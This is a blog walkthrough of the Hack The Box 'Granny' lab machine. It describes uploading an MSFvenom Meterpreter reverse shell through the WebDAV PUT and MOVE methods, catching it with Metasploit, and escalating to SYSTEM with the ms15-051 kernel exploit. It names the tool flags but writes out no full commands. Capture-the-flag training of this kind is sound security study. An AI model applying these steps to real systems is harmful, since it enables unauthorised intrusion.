CTF Walkthroughs, Hack The Box

Hack The Box – Granny Walkthrough

January 21, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows box that involved exploiting the PUT method in the WebDAV extension of the HTTP protocol to upload a reverse shell in order to obtain remote access, and exploiting a Windows vulnerability in the win32k.sys kernel mode driver.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

It looks like the PUT method is allowed. This could be used to upload a web shell and obtain remote access to the machine.

Using davtest to check whether files can be uploaded to the web server

WebDAV Shell Upload Exploitation

Creating an .html shell using MSFvenom with the following flags

  • -p to specify the payload type, in this case the Windows Meterpreter reverse shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format, in this case asp

Then uploading the file first as html and then using the MOVE method to rename it to asp:

Starting MSFconsole, selecting the multi handler module, setting and running the exploit:

  • RHOST to specify the target host IP address
  • payload to specify the payload type, in this case the Windows reverse TCP shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

Navigating to the .asp shell to trigger it

A call back was received which granted a reverse shell

Privilege Escalation

Migrating to a more stable and privileged process

Running the local exploit suggester to Metaspoit module to look for exploits, all that is required it to select the session to run the module against

Selecting the ms15-051 Client Copy Image exploit, setting the following flags and running the module:

  • RHOSt to specify the target host IP address
  • Session to specify the session to run the module against
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

This exploit worked and granted a SYSTEM level shell.

Conclusion

This was a fairly easy box and even though it doesn’t necessarily bring anything new to the table it allows to practice WebDAV exploitation, Windows Kernel Exploits and overall it’s a pretty good machine.